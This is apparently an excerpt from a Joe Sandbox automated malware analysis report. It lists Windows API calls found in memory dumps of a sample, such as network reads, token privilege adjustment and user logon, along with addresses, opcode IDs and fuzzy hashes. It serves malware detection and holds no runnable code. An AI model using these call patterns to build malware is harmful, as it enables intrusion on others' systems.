                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: ($|
                                                        • API String ID: 1659193697-1631851259
                                                        • Opcode ID: 05c120b0116219c98b4448f11e4d90812c8270a70743722488f82d7aa9aa541e
                                                        • Instruction ID: 033994f1bcce20ec689a92da991daacf99dc9c6dfceeb6ce0d5b4d3c48c02b87
                                                        • Opcode Fuzzy Hash: 05c120b0116219c98b4448f11e4d90812c8270a70743722488f82d7aa9aa541e
                                                        • Instruction Fuzzy Hash: 8B323575A007059FDB28CF59D4819AAB7F1FF48320B15C46EE89ADB3A1E770E981CB44
                                                        APIs
                                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0013180A,00000000), ref: 001323E1
                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00132418
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                        • String ID:
                                                        • API String ID: 599397726-0
                                                        • Opcode ID: 3ea2d9cfc92a7dd2e02c8a650ef1586e1892e5d7bfab6f894d0c992f1d6048b3
                                                        • Instruction ID: d3d1439e4c773cf7e19f8312ee26951698016b05e6cd2b0021559a6f331804c0
                                                        • Opcode Fuzzy Hash: 3ea2d9cfc92a7dd2e02c8a650ef1586e1892e5d7bfab6f894d0c992f1d6048b3
                                                        • Instruction Fuzzy Hash: CD410571A04309BFEB20EE95DC81FBBB7BCFB44724F10402EF645A6241EBB59E419660
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0012B343
                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0012B39D
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0012B3EA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DiskFreeSpace
                                                        • String ID:
                                                        • API String ID: 1682464887-0
                                                        • Opcode ID: 951182d6a3b6a473e2f4411bf32bb8e5d04eca889acbd73c8b1294d7f853362c
                                                        • Instruction ID: 49e48ad123c7eb8c430d76f31d475997bcf61bf265c9a536e307c384f14768f9
                                                        • Opcode Fuzzy Hash: 951182d6a3b6a473e2f4411bf32bb8e5d04eca889acbd73c8b1294d7f853362c
                                                        • Instruction Fuzzy Hash: 3C213235A00518DFCB00DF95D885EEDBBB8FF49314F1480A9E905AB361DB319959CB51
                                                        APIs
                                                          • Part of subcall function 000E0DB6: std::exception::exception.LIBCMT ref: 000E0DEC
                                                          • Part of subcall function 000E0DB6: __CxxThrowException@8.LIBCMT ref: 000E0E01
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0011882B
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00118858
                                                        • GetLastError.KERNEL32 ref: 00118865
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1922334811-0
                                                        • Opcode ID: 62fc56cf03b361ff9f8a9785fc1e2d5263c009a95d7b2044ebeaa61fd13c5629
                                                        • Instruction ID: e799ec45ee2863a054b223fbd4e5b02bcd100adc860f1e7df62bc7e4db8b3746
                                                        • Opcode Fuzzy Hash: 62fc56cf03b361ff9f8a9785fc1e2d5263c009a95d7b2044ebeaa61fd13c5629
                                                        • Instruction Fuzzy Hash: 72119DB2404205AFE718DFA4DC85DABB7A9EB45310B20852EF45593612EB70AC818B60
                                                        APIs
                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00118774
                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0011878B
                                                        • FreeSid.ADVAPI32(?), ref: 0011879B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                        • String ID:
                                                        • API String ID: 3429775523-0
                                                        • Opcode ID: 4ca5a8493e0d23bcdb04688de8f23e2621cfb342be6b54a6abb014a2ff0ca35b
                                                        • Instruction ID: ab39e3fc282ffa0d42402e1fc5cbd0d11586680238682e5df3eee9d8c069a2c0
                                                        • Opcode Fuzzy Hash: 4ca5a8493e0d23bcdb04688de8f23e2621cfb342be6b54a6abb014a2ff0ca35b
                                                        • Instruction Fuzzy Hash: 22F04979A1130CBFDF04DFF4DC89AAEBBBDEF08201F1044A9A901E3691E7716A448B50
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0012C6FB
                                                        • FindClose.KERNEL32(00000000), ref: 0012C72B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: af3e7f594183cdde979e074156996fd1c57dc0b96e8b882b9506481fc34bd2d8
                                                        • Instruction ID: 33dd6843f1efb0841ff231f60d08899448fbbce063fee75fb3a2e812f537b5c1
                                                        • Opcode Fuzzy Hash: af3e7f594183cdde979e074156996fd1c57dc0b96e8b882b9506481fc34bd2d8
                                                        • Instruction Fuzzy Hash: 9F118E766006009FDB10DF29D849E6EF7E9FF85320F00851DF9A9872A1DB30A805CB91
                                                        APIs
                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00139468,?,0014FB84,?), ref: 0012A097
                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00139468,?,0014FB84,?), ref: 0012A0A9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ErrorFormatLastMessage
                                                        • String ID:
                                                        • API String ID: 3479602957-0
                                                        • Opcode ID: 4747cef4f52005f4eea9642c38bf29dd7e4fed263fb2d46541625412338ef110
                                                        • Instruction ID: d71c067a47c0fa05acbdb033700485212983a5706a9fd17827e5ecff8b1d70d0
                                                        • Opcode Fuzzy Hash: 4747cef4f52005f4eea9642c38bf29dd7e4fed263fb2d46541625412338ef110
                                                        • Instruction Fuzzy Hash: 5BF0823910522DABDB219FA4DC48FEA776CBF09361F008269F909D6292D7709954CBA1
                                                        APIs
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00118309), ref: 001181E0
                                                        • CloseHandle.KERNEL32(?,?,00118309), ref: 001181F2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                        • String ID:
                                                        • API String ID: 81990902-0
                                                        • Opcode ID: 0d8e303012f9112852cebd71d2615c3e141c77500ba2d37716f00b98fba650bd
                                                        • Instruction ID: 6774db933f925824b39ff77ea1a60be62fc6cd7369b8b934c4503a3357553db7
                                                        • Opcode Fuzzy Hash: 0d8e303012f9112852cebd71d2615c3e141c77500ba2d37716f00b98fba650bd
                                                        • Instruction Fuzzy Hash: 1EE0EC76010610AFE7262B61EC09DB77BEEEF04310714883DF8A684971DB62ACD1DB10
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,000E8D57,?,?,?,00000001), ref: 000EA15A
                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 000EA163
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 90c287fbb11db515f81d8fe5b4b3aeb418d57e4f4ff8e1af8aa8f7cd4236fba6
                                                        • Instruction ID: f6e371a4eb1a5e8086de6210deb1abde3f990edb3bc206889ccb09fee1809598
                                                        • Opcode Fuzzy Hash: 90c287fbb11db515f81d8fe5b4b3aeb418d57e4f4ff8e1af8aa8f7cd4236fba6
                                                        • Instruction Fuzzy Hash: 13B09235054208ABCA002F91EC09F883F68FB46AA2F404024F60D84A70CB625492CA91
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c7cb7fe0b8d6126f70d973311140043d0163965b9410513b8d3abccb7827816b
                                                        • Instruction ID: 9c34cda582c3e3a90a0440250efba92280e1fa0a7f31a013f352df07ce62ce50
                                                        • Opcode Fuzzy Hash: c7cb7fe0b8d6126f70d973311140043d0163965b9410513b8d3abccb7827816b
                                                        • Instruction Fuzzy Hash: B432F322D29F428DD7639635D932335A289AFB73C5F15D737E81AB9DA6EB28C4C34100
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4eeba7046ca0fd4b64d093f79fc43022e081fa919a85097cb5c5259c71296956
                                                        • Instruction ID: eb2c55fc15b0af6cd9a26171c8a6507ea375280bc4a94773d6ee555fd5f0446e
                                                        • Opcode Fuzzy Hash: 4eeba7046ca0fd4b64d093f79fc43022e081fa919a85097cb5c5259c71296956
                                                        • Instruction Fuzzy Hash: 1CB1E120D6AF418DD26396398835336BA5CBFBB2CAF91D71BFC1678D22EB2185C34141
                                                        APIs
                                                        • __time64.LIBCMT ref: 0012889B
                                                          • Part of subcall function 000E520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00128F6E,00000000,?,?,?,?,0012911F,00000000,?), ref: 000E5213
                                                          • Part of subcall function 000E520A: __aulldiv.LIBCMT ref: 000E5233
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                        • String ID:
                                                        • API String ID: 2893107130-0
                                                        • Opcode ID: 4a1e04471296bdb627fac3a733b6e6dc08caee0d418b283401d6e244bd9fc526
                                                        • Instruction ID: 93ddac0814030f647ffe0a0daa760467cb747cdaed392dd6d8ff86fa7afc3cb7
                                                        • Opcode Fuzzy Hash: 4a1e04471296bdb627fac3a733b6e6dc08caee0d418b283401d6e244bd9fc526
                                                        • Instruction Fuzzy Hash: 4421AF326256208BC729CF29D841A52B3E1EBA5311F688E6CD1F5CB2C0CB34BA45CB94
                                                        APIs
                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00124C4A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: mouse_event
                                                        • String ID:
                                                        • API String ID: 2434400541-0
                                                        • Opcode ID: 6d6476b503d4e5359e064a4d13c77e7df112ffa309053894e8041c79c610146c
                                                        • Instruction ID: 1982282cac57d74ec1005e952ccf0864e595a641119646142f9dba20d300c11b
                                                        • Opcode Fuzzy Hash: 6d6476b503d4e5359e064a4d13c77e7df112ffa309053894e8041c79c610146c
                                                        • Instruction Fuzzy Hash: A3D05EA51652393BEE1C0728BE0FF7A0108E301792FD1814971018E0C1EE809CB05430
                                                        APIs
                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00118389), ref: 001187D1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: LogonUser
                                                        • String ID:
                                                        • API String ID: 1244722697-0
                                                        • Opcode ID: 96c1f8c10d419e61b63268e89b20ef6afee4f0c635bb0e269788277a992c19ce
                                                        • Instruction ID: 14dae722be3da0392da71584c6ed78dc493e2237634c51411902d32fa3746dcd
                                                        • Opcode Fuzzy Hash: 96c1f8c10d419e61b63268e89b20ef6afee4f0c635bb0e269788277a992c19ce
                                                        • Instruction Fuzzy Hash: 5CD05E3226050EABEF018EA4DC05EAF3B6AEB04B01F408111FE15C61A1C775D835AB60
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 000EA12A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 2789fd0a1b8356ff5ab1fb807f708b4b4363447205b801e4d50658d2f4ac2a46
                                                        • Instruction ID: cbaf64d27939dd503da1718a83e07af26a2e13013bec4e9007a5725e71c43302
                                                        • Opcode Fuzzy Hash: 2789fd0a1b8356ff5ab1fb807f708b4b4363447205b801e4d50658d2f4ac2a46
                                                        • Instruction Fuzzy Hash: A1A0123000010CA78A001F41EC048447F5CE7015907004020F40C40531873254518580
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ac6b6b98797bca176c1aadcff554034faa42b4aaa8f0bdc19c72cd3e8e2fa1fa
                                                        • Instruction ID: aa3f8211606a362d3f3a37e47977159e6f91682d6e54570eaa6a0bea2f42418a
                                                        • Opcode Fuzzy Hash: ac6b6b98797bca176c1aadcff554034faa42b4aaa8f0bdc19c72cd3e8e2fa1fa
                                                        • Instruction Fuzzy Hash: F9222530504716CBEF3C8A68C4A46BCB7E2BF81344F69C06BD59687692DB709DD1CB62
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                        • Instruction ID: de688585cd31c85aa32646145c86b8f54b1a00eaedcceef5426de1cb0ecab516
                                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                        • Instruction Fuzzy Hash: 31C163322091D30EDBAD463B887417EBAE55FA27B131A076DD4B3EB1D4EE20C975D620
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                        • Instruction ID: 8c2639288d4a405bcf7f77c7818d61294dff7a0e263eb61e2e7bf4d320129e61
                                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                        • Instruction Fuzzy Hash: 66C180322091D30EDFAD463B883407EBAE55FA27B131A176DD4B2EB1D5EE20C975D620
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction ID: 945c39c5b357f57b36121bd83260bcb79e2f0a6fedf8d335b308cd1d30f2e7aa
                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction Fuzzy Hash: CCC16D322091D30DDFAD463B88741BEBAE15FA27B131A076DD4B2EB1D5EE30C9659620
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162345808.00000000014CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014CC000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_14cc000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                        • Instruction ID: 1173775c8d37dec37e770053087d202910f49d7be9c618660a8f3ee47964277f
                                                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                        • Instruction Fuzzy Hash: 0B41D571D1051CEBCF48CFADC991AEEBBF1AF88201F548299D516AB345D730AB41DB40
